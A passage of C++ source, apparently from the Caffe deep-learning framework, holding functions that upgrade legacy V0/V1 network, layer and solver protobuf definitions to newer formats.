(v0_net_param.has_force_backward()) { net_param->set_force_backward(v0_net_param.force_backward()); } return is_fully_compatible; } void UpgradeV0PaddingLayers(const NetParameter& param, NetParameter* param_upgraded_pad) { // Copy everything other than the layers from the original param. param_upgraded_pad->Clear(); param_upgraded_pad->CopyFrom(param); param_upgraded_pad->clear_layers(); // Figure out which layer each bottom blob comes from. map<string, int> blob_name_to_last_top_idx; for (int i = 0; i < param.input_size(); ++i) { const string& blob_name = param.input(i); blob_name_to_last_top_idx[blob_name] = -1; } for (int i = 0; i < param.layers_size(); ++i) { const V1LayerParameter& layer_connection = param.layers(i); const V0LayerParameter& layer_param = layer_connection.layer(); // Add the layer to the new net, unless it's a padding layer. if (layer_param.type() != "padding") { param_upgraded_pad->add_layers()->CopyFrom(layer_connection); } for (int j = 0; j < layer_connection.bottom_size(); ++j) { const string& blob_name = layer_connection.bottom(j); if (blob_name_to_last_top_idx.find(blob_name) == blob_name_to_last_top_idx.end()) { LOG(FATAL) << "Unknown blob input " << blob_name << " to layer " << j; } const int top_idx = blob_name_to_last_top_idx[blob_name]; if (top_idx == -1) { continue; } const V1LayerParameter& source_layer = param.layers(top_idx); if (source_layer.layer().type() == "padding") { // This layer has a padding layer as input -- check that it is a conv // layer or a pooling layer and takes only one input. Also check that // the padding layer input has only one input and one output. Other // cases have undefined behavior in Caffe. CHECK((layer_param.type() == "conv") || (layer_param.type() == "pool")) << "Padding layer input to " "non-convolutional / non-pooling layer type " << layer_param.type(); CHECK_EQ(layer_connection.bottom_size(), 1) << "Conv Layer takes a single blob as input."; CHECK_EQ(source_layer.bottom_size(), 1) << "Padding Layer takes a single blob as input."; CHECK_EQ(source_layer.top_size(), 1) << "Padding Layer produces a single blob as output."; int layer_index = param_upgraded_pad->layers_size() - 1; param_upgraded_pad->mutable_layers(layer_index)->mutable_layer() ->set_pad(source_layer.layer().pad()); param_upgraded_pad->mutable_layers(layer_index) ->set_bottom(j, source_layer.bottom(0)); } } for (int j = 0; j < layer_connection.top_size(); ++j) { const string& blob_name = layer_connection.top(j); blob_name_to_last_top_idx[blob_name] = i; } } } bool UpgradeV0LayerParameter(const V1LayerParameter& v0_layer_connection, V1LayerParameter* layer_param) { bool is_fully_compatible = true; layer_param->Clear(); for (int i = 0; i < v0_layer_connection.bottom_size(); ++i) { layer_param->add_bottom(v0_layer_connection.bottom(i)); } for (int i = 0; i < v0_layer_connection.top_size(); ++i) { layer_param->add_top(v0_layer_connection.top(i)); } if (v0_layer_connection.has_layer()) { const V0LayerParameter& v0_layer_param = v0_layer_connection.layer(); if (v0_layer_param.has_name()) { layer_param->set_name(v0_layer_param.name()); } const string& type = v0_layer_param.type(); if (v0_layer_param.has_type()) { layer_param->set_type(UpgradeV0LayerType(type)); } for (int i = 0; i < v0_layer_param.blobs_size(); ++i) { layer_param->add_blobs()->CopyFrom(v0_layer_param.blobs(i)); } for (int i = 0; i < v0_layer_param.blobs_lr_size(); ++i) { layer_param->add_blobs_lr(v0_layer_param.blobs_lr(i)); } for (int i = 0; i < v0_layer_param.weight_decay_size(); ++i) { layer_param->add_weight_decay(v0_layer_param.weight_decay(i)); } if (v0_layer_param.has_num_output()) { if (type == "conv") { layer_param->mutable_convolution_param()->set_num_output( v0_layer_param.num_output()); } else if (type == "innerproduct") { layer_param->mutable_inner_product_param()->set_num_output( v0_layer_param.num_output()); } else { LOG(ERROR) << "Unknown parameter num_output for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_biasterm()) { if (type == "conv") { layer_param->mutable_convolution_param()->set_bias_term( v0_layer_param.biasterm()); } else if (type == "innerproduct") { layer_param->mutable_inner_product_param()->set_bias_term( v0_layer_param.biasterm()); } else { LOG(ERROR) << "Unknown parameter biasterm for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_weight_filler()) { if (type == "conv") { layer_param->mutable_convolution_param()-> mutable_weight_filler()->CopyFrom(v0_layer_param.weight_filler()); } else if (type == "innerproduct") { layer_param->mutable_inner_product_param()-> mutable_weight_filler()->CopyFrom(v0_layer_param.weight_filler()); } else { LOG(ERROR) << "Unknown parameter weight_filler for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_bias_filler()) { if (type == "conv") { layer_param->mutable_convolution_param()-> mutable_bias_filler()->CopyFrom(v0_layer_param.bias_filler()); } else if (type == "innerproduct") { layer_param->mutable_inner_product_param()-> mutable_bias_filler()->CopyFrom(v0_layer_param.bias_filler()); } else { LOG(ERROR) << "Unknown parameter bias_filler for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_pad()) { if (type == "conv") { layer_param->mutable_convolution_param()->add_pad(v0_layer_param.pad()); } else if (type == "pool") { layer_param->mutable_pooling_param()->set_pad(v0_layer_param.pad()); } else { LOG(ERROR) << "Unknown parameter pad for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_kernelsize()) { if (type == "conv") { layer_param->mutable_convolution_param()->add_kernel_size( v0_layer_param.kernelsize()); } else if (type == "pool") { layer_param->mutable_pooling_param()->set_kernel_size( v0_layer_param.kernelsize()); } else { LOG(ERROR) << "Unknown parameter kernelsize for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_group()) { if (type == "conv") { layer_param->mutable_convolution_param()->set_group( v0_layer_param.group()); } else { LOG(ERROR) << "Unknown parameter group for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_stride()) { if (type == "conv") { layer_param->mutable_convolution_param()->add_stride( v0_layer_param.stride()); } else if (type == "pool") { layer_param->mutable_pooling_param()->set_stride( v0_layer_param.stride()); } else { LOG(ERROR) << "Unknown parameter stride for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_pool()) { if (type == "pool") { V0LayerParameter_PoolMethod pool = v0_layer_param.pool(); switch (pool) { case V0LayerParameter_PoolMethod_MAX: layer_param->mutable_pooling_param()->set_pool( PoolingParameter_PoolMethod_MAX); break; case V0LayerParameter_PoolMethod_AVE: layer_param->mutable_pooling_param()->set_pool( PoolingParameter_PoolMethod_AVE); break; case V0LayerParameter_PoolMethod_STOCHASTIC: layer_param->mutable_pooling_param()->set_pool( PoolingParameter_PoolMethod_STOCHASTIC); break; default: LOG(ERROR) << "Unknown pool method " << pool; is_fully_compatible = false; } } else { LOG(ERROR) << "Unknown parameter pool for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_dropout_ratio()) { if (type == "dropout") { layer_param->mutable_dropout_param()->set_dropout_ratio( v0_layer_param.dropout_ratio()); } else { LOG(ERROR) << "Unknown parameter dropout_ratio for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_local_size()) { if (type == "lrn") { layer_param->mutable_lrn_param()->set_local_size( v0_layer_param.local_size()); } else { LOG(ERROR) << "Unknown parameter local_size for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_alpha()) { if (type == "lrn") { layer_param->mutable_lrn_param()->set_alpha(v0_layer_param.alpha()); } else { LOG(ERROR) << "Unknown parameter alpha for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_beta()) { if (type == "lrn") { layer_param->mutable_lrn_param()->set_beta(v0_layer_param.beta()); } else { LOG(ERROR) << "Unknown parameter beta for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_k()) { if (type == "lrn") { layer_param->mutable_lrn_param()->set_k(v0_layer_param.k()); } else { LOG(ERROR) << "Unknown parameter k for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_source()) { if (type == "data") { layer_param->mutable_data_param()->set_source(v0_layer_param.source()); } else if (type == "hdf5_data") { layer_param->mutable_hdf5_data_param()->set_source( v0_layer_param.source()); } else if (type == "images") { layer_param->mutable_image_data_param()->set_source( v0_layer_param.source()); } else if (type == "window_data") { layer_param->mutable_window_data_param()->set_source( v0_layer_param.source()); } else if (type == "infogain_loss") { layer_param->mutable_infogain_loss_param()->set_source( v0_layer_param.source()); } else { LOG(ERROR) << "Unknown parameter source for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_scale()) { layer_param->mutable_transform_param()-> set_scale(v0_layer_param.scale()); } if (v0_layer_param.has_meanfile()) { layer_param->mutable_transform_param()-> set_mean_file(v0_layer_param.meanfile()); } if (v0_layer_param.has_batchsize()) { if (type == "data") { layer_param->mutable_data_param()->set_batch_size( v0_layer_param.batchsize()); } else if (type == "hdf5_data") { layer_param->mutable_hdf5_data_param()->set_batch_size( v0_layer_param.batchsize()); } else if (type == "images") { layer_param->mutable_image_data_param()->set_batch_size( v0_layer_param.batchsize()); } else if (type == "window_data") { layer_param->mutable_window_data_param()->set_batch_size( v0_layer_param.batchsize()); } else { LOG(ERROR) << "Unknown parameter batchsize for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_cropsize()) { layer_param->mutable_transform_param()-> set_crop_size(v0_layer_param.cropsize()); } if (v0_layer_param.has_mirror()) { layer_param->mutable_transform_param()-> set_mirror(v0_layer_param.mirror()); } if (v0_layer_param.has_rand_skip()) { if (type == "data") { layer_param->mutable_data_param()->set_rand_skip( v0_layer_param.rand_skip()); } else if (type == "images") { layer_param->mutable_image_data_param()->set_rand_skip( v0_layer_param.rand_skip()); } else { LOG(ERROR) << "Unknown parameter rand_skip for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_shuffle_images()) { if (type == "images") { layer_param->mutable_image_data_param()->set_shuffle( v0_layer_param.shuffle_images()); } else { LOG(ERROR) << "Unknown parameter shuffle for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_new_height()) { if (type == "images") { layer_param->mutable_image_data_param()->set_new_height( v0_layer_param.new_height()); } else { LOG(ERROR) << "Unknown parameter new_height for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_new_width()) { if (type == "images") { layer_param->mutable_image_data_param()->set_new_width( v0_layer_param.new_width()); } else { LOG(ERROR) << "Unknown parameter new_width for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_concat_dim()) { if (type == "concat") { layer_param->mutable_concat_param()->set_concat_dim( v0_layer_param.concat_dim()); } else { LOG(ERROR) << "Unknown parameter concat_dim for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_det_fg_threshold()) { if (type == "window_data") { layer_param->mutable_window_data_param()->set_fg_threshold( v0_layer_param.det_fg_threshold()); } else { LOG(ERROR) << "Unknown parameter det_fg_threshold for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_det_bg_threshold()) { if (type == "window_data") { layer_param->mutable_window_data_param()->set_bg_threshold( v0_layer_param.det_bg_threshold()); } else { LOG(ERROR) << "Unknown parameter det_bg_threshold for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_det_fg_fraction()) { if (type == "window_data") { layer_param->mutable_window_data_param()->set_fg_fraction( v0_layer_param.det_fg_fraction()); } else { LOG(ERROR) << "Unknown parameter det_fg_fraction for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_det_context_pad()) { if (type == "window_data") { layer_param->mutable_window_data_param()->set_context_pad( v0_layer_param.det_context_pad()); } else { LOG(ERROR) << "Unknown parameter det_context_pad for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_det_crop_mode()) { if (type == "window_data") { layer_param->mutable_window_data_param()->set_crop_mode( v0_layer_param.det_crop_mode()); } else { LOG(ERROR) << "Unknown parameter det_crop_mode for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_hdf5_output_param()) { if (type == "hdf5_output") { layer_param->mutable_hdf5_output_param()->CopyFrom( v0_layer_param.hdf5_output_param()); } else { LOG(ERROR) << "Unknown parameter hdf5_output_param for layer type " << type; is_fully_compatible = false; } } } return is_fully_compatible; } V1LayerParameter_LayerType UpgradeV0LayerType(const string& type) { if (type == "accuracy") { return V1LayerParameter_LayerType_ACCURACY; } else if (type == "bnll") { return V1LayerParameter_LayerType_BNLL; } else if (type == "concat") { return V1LayerParameter_LayerType_CONCAT; } else if (type == "conv") { return V1LayerParameter_LayerType_CONVOLUTION; } else if (type == "data") { return V1LayerParameter_LayerType_DATA; } else if (type == "dropout") { return V1LayerParameter_LayerType_DROPOUT; } else if (type == "euclidean_loss") { return V1LayerParameter_LayerType_EUCLIDEAN_LOSS; } else if (type == "flatten") { return V1LayerParameter_LayerType_FLATTEN; } else if (type == "hdf5_data") { return V1LayerParameter_LayerType_HDF5_DATA; } else if (type == "hdf5_output") { return V1LayerParameter_LayerType_HDF5_OUTPUT; } else if (type == "im2col") { return V1LayerParameter_LayerType_IM2COL; } else if (type == "images") { return V1LayerParameter_LayerType_IMAGE_DATA; } else if (type == "infogain_loss") { return V1LayerParameter_LayerType_INFOGAIN_LOSS; } else if (type == "innerproduct") { return V1LayerParameter_LayerType_INNER_PRODUCT; } else if (type == "lrn") { return V1LayerParameter_LayerType_LRN; } else if (type == "multinomial_logistic_loss") { return V1LayerParameter_LayerType_MULTINOMIAL_LOGISTIC_LOSS; } else if (type == "pool") { return V1LayerParameter_LayerType_POOLING; } else if (type == "relu") { return V1LayerParameter_LayerType_RELU; } else if (type == "sigmoid") { return V1LayerParameter_LayerType_SIGMOID; } else if (type == "softmax") { return V1LayerParameter_LayerType_SOFTMAX; } else if (type == "softmax_loss") { return V1LayerParameter_LayerType_SOFTMAX_LOSS; } else if (type == "split") { return V1LayerParameter_LayerType_SPLIT; } else if (type == "tanh") { return V1LayerParameter_LayerType_TANH; } else if (type == "window_data") { return V1LayerParameter_LayerType_WINDOW_DATA; } else { LOG(FATAL) << "Unknown layer name: " << type; return V1LayerParameter_LayerType_NONE; } } bool NetNeedsDataUpgrade(const NetParameter& net_param) { for (int i = 0; i < net_param.layers_size(); ++i) { if (net_param.layers(i).type() == V1LayerParameter_LayerType_DATA) { DataParameter layer_param = net_param.layers(i).data_param(); if (layer_param.has_scale()) { return true; } if (layer_param.has_mean_file()) { return true; } if (layer_param.has_crop_size()) { return true; } if (layer_param.has_mirror()) { return true; } } if (net_param.layers(i).type() == V1LayerParameter_LayerType_IMAGE_DATA) { ImageDataParameter layer_param = net_param.layers(i).image_data_param(); if (layer_param.has_scale()) { return true; } if (layer_param.has_mean_file()) { return true; } if (layer_param.has_crop_size()) { return true; } if (layer_param.has_mirror()) { return true; } } if (net_param.layers(i).type() == V1LayerParameter_LayerType_WINDOW_DATA) { WindowDataParameter layer_param = net_param.layers(i).window_data_param(); if (layer_param.has_scale()) { return true; } if (layer_param.has_mean_file()) { return true; } if (layer_param.has_crop_size()) { return true; } if (layer_param.has_mirror()) { return true; } } } return false; } #define CONVERT_LAYER_TRANSFORM_PARAM(TYPE, Name, param_name) \ do { \ if (net_param->layers(i).type() == V1LayerParameter_LayerType_##TYPE) { \ Name##Parameter* layer_param = \ net_param->mutable_layers(i)->mutable_##param_name##_param(); \ TransformationParameter* transform_param = \ net_param->mutable_layers(i)->mutable_transform_param(); \ if (layer_param->has_scale()) { \ transform_param->set_scale(layer_param->scale()); \ layer_param->clear_scale(); \ } \ if (layer_param->has_mean_file()) { \ transform_param->set_mean_file(layer_param->mean_file()); \ layer_param->clear_mean_file(); \ } \ if (layer_param->has_crop_size()) { \ transform_param->set_crop_size(layer_param->crop_size()); \ layer_param->clear_crop_size(); \ } \ if (layer_param->has_mirror()) { \ transform_param->set_mirror(layer_param->mirror()); \ layer_param->clear_mirror(); \ } \ } \ } while (0) void UpgradeNetDataTransformation(NetParameter* net_param) { for (int i = 0; i < net_param->layers_size(); ++i) { CONVERT_LAYER_TRANSFORM_PARAM(DATA, Data, data); CONVERT_LAYER_TRANSFORM_PARAM(IMAGE_DATA, ImageData, image_data); CONVERT_LAYER_TRANSFORM_PARAM(WINDOW_DATA, WindowData, window_data); } } bool UpgradeV1Net(const NetParameter& v1_net_param, NetParameter* net_param) { if (v1_net_param.layer_size() > 0) { LOG(FATAL) << "Refusing to upgrade inconsistent NetParameter input; " << "the definition includes both 'layer' and 'layers' fields. " << "The current format defines 'layer' fields with string type like " << "layer { type: 'Layer' ... } and not layers { type: LAYER ... }. " << "Manually switch the definition to 'layer' format to continue."; } bool is_fully_compatible = true; net_param->CopyFrom(v1_net_param); net_param->clear_layers(); net_param->clear_layer(); for (int i = 0; i < v1_net_param.layers_size(); ++i) { if (!UpgradeV1LayerParameter(v1_net_param.layers(i), net_param->add_layer())) { LOG(ERROR) << "Upgrade of input layer " << i << " failed."; is_fully_compatible = false; } } return is_fully_compatible; } bool UpgradeV1LayerParameter(const V1LayerParameter& v1_layer_param, LayerParameter* layer_param) { layer_param->Clear(); bool is_fully_compatible = true; for (int i = 0; i < v1_layer_param.bottom_size(); ++i) { layer_param->add_bottom(v1_layer_param.bottom(i)); } for (int i = 0; i < v1_layer_param.top_size(); ++i) { layer_param->add_top(v1_layer_param.top(i)); } if (v1_layer_param.has_name()) { layer_param->set_name(v1_layer_param.name()); } for (int i = 0; i < v1_layer_param.include_size(); ++i) { layer_param->add_include()->CopyFrom(v1_layer_param.include(i)); } for (int i = 0; i < v1_layer_param.exclude_size(); ++i) { layer_param->add_exclude()->CopyFrom(v1_layer_param.exclude(i)); } if (v1_layer_param.has_type()) { layer_param->set_type(UpgradeV1LayerType(v1_layer_param.type())); } for (int i = 0; i < v1_layer_param.blobs_size(); ++i) { layer_param->add_blobs()->CopyFrom(v1_layer_param.blobs(i)); } for (int i = 0; i < v1_layer_param.param_size(); ++i) { while (layer_param->param_size() <= i) { layer_param->add_param(); } layer_param->mutable_param(i)->set_name(v1_layer_param.param(i)); } ParamSpec_DimCheckMode mode; for (int i = 0; i < v1_layer_param.blob_share_mode_size(); ++i) { while (layer_param->param_size() <= i) { layer_param->add_param(); } switch (v1_layer_param.blob_share_mode(i)) { case V1LayerParameter_DimCheckMode_STRICT: mode = ParamSpec_DimCheckMode_STRICT; break; case V1LayerParameter_DimCheckMode_PERMISSIVE: mode = ParamSpec_DimCheckMode_PERMISSIVE; break; default: LOG(FATAL) << "Unknown blob_share_mode: " << v1_layer_param.blob_share_mode(i); break; } layer_param->mutable_param(i)->set_share_mode(mode); } for (int i = 0; i < v1_layer_param.blobs_lr_size(); ++i) { while (layer_param->param_size() <= i) { layer_param->add_param(); } layer_param->mutable_param(i)->set_lr_mult(v1_layer_param.blobs_lr(i)); } for (int i = 0; i < v1_layer_param.weight_decay_size(); ++i) { while (layer_param->param_size() <= i) { layer_param->add_param(); } layer_param->mutable_param(i)->set_decay_mult( v1_layer_param.weight_decay(i)); } for (int i = 0; i < v1_layer_param.loss_weight_size(); ++i) { layer_param->add_loss_weight(v1_layer_param.loss_weight(i)); } if (v1_layer_param.has_accuracy_param()) { layer_param->mutable_accuracy_param()->CopyFrom( v1_layer_param.accuracy_param()); } if (v1_layer_param.has_argmax_param()) { layer_param->mutable_argmax_param()->CopyFrom( v1_layer_param.argmax_param()); } if (v1_layer_param.has_concat_param()) { layer_param->mutable_concat_param()->CopyFrom( v1_layer_param.concat_param()); } if (v1_layer_param.has_contrastive_loss_param()) { layer_param->mutable_contrastive_loss_param()->CopyFrom( v1_layer_param.contrastive_loss_param()); } if (v1_layer_param.has_convolution_param()) { layer_param->mutable_convolution_param()->CopyFrom( v1_layer_param.convolution_param()); } if (v1_layer_param.has_data_param()) { layer_param->mutable_data_param()->CopyFrom( v1_layer_param.data_param()); } if (v1_layer_param.has_dropout_param()) { layer_param->mutable_dropout_param()->CopyFrom( v1_layer_param.dropout_param()); } if (v1_layer_param.has_dummy_data_param()) { layer_param->mutable_dummy_data_param()->CopyFrom( v1_layer_param.dummy_data_param()); } if (v1_layer_param.has_eltwise_param()) { layer_param->mutable_eltwise_param()->CopyFrom( v1_layer_param.eltwise_param()); } if (v1_layer_param.has_exp_param()) { layer_param->mutable_exp_param()->CopyFrom( v1_layer_param.exp_param()); } if (v1_layer_param.has_hdf5_data_param()) { layer_param->mutable_hdf5_data_param()->CopyFrom( v1_layer_param.hdf5_data_param()); } if (v1_layer_param.has_hdf5_output_param()) { layer_param->mutable_hdf5_output_param()->CopyFrom( v1_layer_param.hdf5_output_param()); } if (v1_layer_param.has_hinge_loss_param()) { layer_param->mutable_hinge_loss_param()->CopyFrom( v1_layer_param.hinge_loss_param()); } if (v1_layer_param.has_image_data_param()) { layer_param->mutable_image_data_param()->CopyFrom( v1_layer_param.image_data_param()); } if (v1_layer_param.has_infogain_loss_param()) { layer_param->mutable_infogain_loss_param()->CopyFrom( v1_layer_param.infogain_loss_param()); } if (v1_layer_param.has_inner_product_param()) { layer_param->mutable_inner_product_param()->CopyFrom( v1_layer_param.inner_product_param()); } if (v1_layer_param.has_lrn_param()) { layer_param->mutable_lrn_param()->CopyFrom( v1_layer_param.lrn_param()); } if (v1_layer_param.has_memory_data_param()) { layer_param->mutable_memory_data_param()->CopyFrom( v1_layer_param.memory_data_param()); } if (v1_layer_param.has_mvn_param()) { layer_param->mutable_mvn_param()->CopyFrom( v1_layer_param.mvn_param()); } if (v1_layer_param.has_pooling_param()) { layer_param->mutable_pooling_param()->CopyFrom( v1_layer_param.pooling_param()); } if (v1_layer_param.has_power_param()) { layer_param->mutable_power_param()->CopyFrom( v1_layer_param.power_param()); } if (v1_layer_param.has_relu_param()) { layer_param->mutable_relu_param()->CopyFrom( v1_layer_param.relu_param()); } if (v1_layer_param.has_sigmoid_param()) { layer_param->mutable_sigmoid_param()->CopyFrom( v1_layer_param.sigmoid_param()); } if (v1_layer_param.has_softmax_param()) { layer_param->mutable_softmax_param()->CopyFrom( v1_layer_param.softmax_param()); } if (v1_layer_param.has_slice_param()) { layer_param->mutable_slice_param()->CopyFrom( v1_layer_param.slice_param()); } if (v1_layer_param.has_tanh_param()) { layer_param->mutable_tanh_param()->CopyFrom( v1_layer_param.tanh_param()); } if (v1_layer_param.has_threshold_param()) { layer_param->mutable_threshold_param()->CopyFrom( v1_layer_param.threshold_param()); } if (v1_layer_param.has_window_data_param()) { layer_param->mutable_window_data_param()->CopyFrom( v1_layer_param.window_data_param()); } if (v1_layer_param.has_transform_param()) { layer_param->mutable_transform_param()->CopyFrom( v1_layer_param.transform_param()); } if (v1_layer_param.has_loss_param()) { layer_param->mutable_loss_param()->CopyFrom( v1_layer_param.loss_param()); } if (v1_layer_param.has_layer()) { LOG(ERROR) << "Input NetParameter has V0 layer -- ignoring."; is_fully_compatible = false; } return is_fully_compatible; } const char* UpgradeV1LayerType(const V1LayerParameter_LayerType type) { switch (type) { case V1LayerParameter_LayerType_NONE: return ""; case V1LayerParameter_LayerType_ABSVAL: return "AbsVal"; case V1LayerParameter_LayerType_ACCURACY: return "Accuracy"; case V1LayerParameter_LayerType_ARGMAX: return "ArgMax"; case V1LayerParameter_LayerType_BNLL: return "BNLL"; case V1LayerParameter_LayerType_CONCAT: return "Concat"; case V1LayerParameter_LayerType_CONTRASTIVE_LOSS: return "ContrastiveLoss"; case V1LayerParameter_LayerType_CONVOLUTION: return "Convolution"; case V1LayerParameter_LayerType_DECONVOLUTION: return "Deconvolution"; case V1LayerParameter_LayerType_DATA: return "Data"; case V1LayerParameter_LayerType_DROPOUT: return "Dropout"; case V1LayerParameter_LayerType_DUMMY_DATA: return "DummyData"; case V1LayerParameter_LayerType_EUCLIDEAN_LOSS: return "EuclideanLoss"; case V1LayerParameter_LayerType_ELTWISE: return "Eltwise"; case V1LayerParameter_LayerType_EXP: return "Exp"; case V1LayerParameter_LayerType_FLATTEN: return "Flatten"; case V1LayerParameter_LayerType_HDF5_DATA: return "HDF5Data"; case V1LayerParameter_LayerType_HDF5_OUTPUT: return "HDF5Output"; case V1LayerParameter_LayerType_HINGE_LOSS: return "HingeLoss"; case V1LayerParameter_LayerType_IM2COL: return "Im2col"; case V1LayerParameter_LayerType_IMAGE_DATA: return "ImageData"; case V1LayerParameter_LayerType_INFOGAIN_LOSS: return "InfogainLoss"; case V1LayerParameter_LayerType_INNER_PRODUCT: return "InnerProduct"; case V1LayerParameter_LayerType_LRN: return "LRN"; case V1LayerParameter_LayerType_MEMORY_DATA: return "MemoryData"; case V1LayerParameter_LayerType_MULTINOMIAL_LOGISTIC_LOSS: return "MultinomialLogisticLoss"; case V1LayerParameter_LayerType_MVN: return "MVN"; case V1LayerParameter_LayerType_POOLING: return "Pooling"; case V1LayerParameter_LayerType_POWER: return "Power"; case V1LayerParameter_LayerType_RELU: return "ReLU"; case V1LayerParameter_LayerType_SIGMOID: return "Sigmoid"; case V1LayerParameter_LayerType_SIGMOID_CROSS_ENTROPY_LOSS: return "SigmoidCrossEntropyLoss"; case V1LayerParameter_LayerType_SILENCE: return "Silence"; case V1LayerParameter_LayerType_SOFTMAX: return "Softmax"; case V1LayerParameter_LayerType_SOFTMAX_LOSS: return "SoftmaxWithLoss"; case V1LayerParameter_LayerType_SPLIT: return "Split"; case V1LayerParameter_LayerType_SLICE: return "Slice"; case V1LayerParameter_LayerType_TANH: return "TanH"; case V1LayerParameter_LayerType_WINDOW_DATA: return "WindowData"; case V1LayerParameter_LayerType_THRESHOLD: return "Threshold"; default: LOG(FATAL) << "Unknown V1LayerParameter layer type: " << type; return ""; } } bool NetNeedsInputUpgrade(const NetParameter& net_param) { return net_param.input_size() > 0; } void UpgradeNetInput(NetParameter* net_param) { // Collect inputs and convert to Input layer definitions. // If the NetParameter holds an input alone, without shape/dim, then // it's a legacy caffemodel and simply stripping the input field is enough. bool has_shape = net_param->input_shape_size() > 0; bool has_dim = net_param->input_dim_size() > 0; if (has_shape || has_dim) { LayerParameter* layer_param = net_param->add_layer(); layer_param->set_name("input"); layer_param->set_type("Input"); InputParameter* input_param = layer_param->mutable_input_param(); // Convert input fields into a layer. for (int i = 0; i < net_param->input_size(); ++i) { layer_param->add_top(net_param->input(i)); if (has_shape) { input_param->add_shape()->CopyFrom(net_param->input_shape(i)); } else { // Turn legacy input dimensions into shape. BlobShape* shape = input_param->add_shape(); int first_dim = i*4; int last_dim = first_dim + 4; for (int j = first_dim; j < last_dim; j++) { shape->add_dim(net_param->input_dim(j)); } } } // Swap input layer to beginning of net to satisfy layer dependencies. for (int i = net_param->layer_size() - 1; i > 0; --i) { net_param->mutable_layer(i-1)->Swap(net_param->mutable_layer(i)); } } // Clear inputs. net_param->clear_input(); net_param->clear_input_shape(); net_param->clear_input_dim(); } bool NetNeedsBatchNormUpgrade(const NetParameter& net_param) { for (int i = 0; i < net_param.layer_size(); ++i) { // Check if BatchNorm layers declare three parameters, as required by // the previous BatchNorm layer definition. if (net_param.layer(i).type() == "BatchNorm" && net_param.layer(i).param_size() == 3) { return true; } } return false; } void UpgradeNetBatchNorm(NetParameter* net_param) { for (int i = 0; i < net_param->layer_size(); ++i) { // Check if BatchNorm layers declare three parameters, as required by // the previous BatchNorm layer definition. if (net_param->layer(i).type() == "BatchNorm" && net_param->layer(i).param_size() == 3) { // set lr_mult and decay_mult to zero. leave all other param intact. for (int ip = 0; ip < net_param->layer(i).param_size(); ip++) { ParamSpec* fixed_param_spec = net_param->mutable_layer(i)->mutable_param(ip); fixed_param_spec->set_lr_mult(0.f); fixed_param_spec->set_decay_mult(0.f); } } } } // Return true iff the solver contains any old solver_type specified as enums bool SolverNeedsTypeUpgrade(const SolverParameter& solver_param) { if (solver_param.has_solver_type()) { return true; } return false; } bool UpgradeSolverType(SolverParameter* solver_param) { CHECK(!solver_param->has_solver_type() || !solver_param->has_type()) << "Failed to upgrade solver: old solver_type field (enum) and new type " << "field (string) cannot be both specified in solver proto text."; if (solver_param->has_solver_type()) { string type; switch (solver_param->solver_type()) { case SolverParameter_SolverType_SGD: type = "SGD"; break; case SolverParameter_SolverType_NESTEROV: type = "Nesterov"; break; case SolverParameter_SolverType_ADAGRAD: type = "AdaGrad"; break; case SolverParameter_SolverType_RMSPROP: type = "RMSProp"; break; case SolverParameter_SolverType_ADADELTA: type = "AdaDelta"; break; case SolverParameter_SolverType_ADAM: type = "Adam"; break; default: LOG(FATAL) << "Unknown SolverParameter solver_type: " << type; } solver_param->set_type(type); solver_param->clear_solver_type(); } else { LOG(ERROR) << "Warning: solver type already up to date. "; return false; } return true; } // Check for deprecations and upgrade the SolverParameter as needed. bool UpgradeSolverAsNeeded(const string& param_file, SolverParameter* param) { bool success = true; // Try to upgrade old style solver_type enum fields into new string type if (SolverNeedsTypeUpgrade(*param)) { LOG(INFO) << "Attempting to upgrade input file specified using deprecated " << "'solver_type' field (enum)': " << param_file; if (!UpgradeSolverType(param)) { success = false; LOG(ERROR) << "Warning: had one or more problems upgrading " << "SolverType (see above)."; } else { LOG(INFO) << "Successfully upgraded file specified using deprecated " << "'solver_type' field (enum) to 'type' field (string)."; LOG(WARNING) << "Note that future Caffe releases will only support " << "'type' field (string) for a solver's type."; } } return success; } // Replaces snapshot_prefix of SolverParameter if it is not specified // or is set to directory void UpgradeSnapshotPrefixProperty(const string& param_file, SolverParameter* param) { using boost::filesystem::path; using boost::filesystem::is_directory; if (!param->has_snapshot_prefix()) { param->set_snapshot_prefix(path(param_file).replace_extension().string()); LOG(INFO) << "snapshot_prefix was not specified and is set to " + param->snapshot_prefix(); } else if (is_directory(param->snapshot_prefix())) { param->set_snapshot_prefix((path(param->snapshot_prefix()) / path(param_file).stem()).string()); LOG(INFO) << "snapshot_prefix was a directory and is replaced to " + param->snapshot_prefix(); } } // Read parameters from a file into a SolverParameter proto message. void ReadSolverParamsFromTextFileOrDie(const string& param_file, SolverParameter* param) { CHECK(ReadProtoFromTextFile(param_file, param)) << "Failed to parse SolverParameter file: " << param_file; UpgradeSolverAsNeeded(param_file, param); UpgradeSnapshotPrefixProperty(param_file, param); } } // namespace caffe
{ "pile_set_name": "Github" }
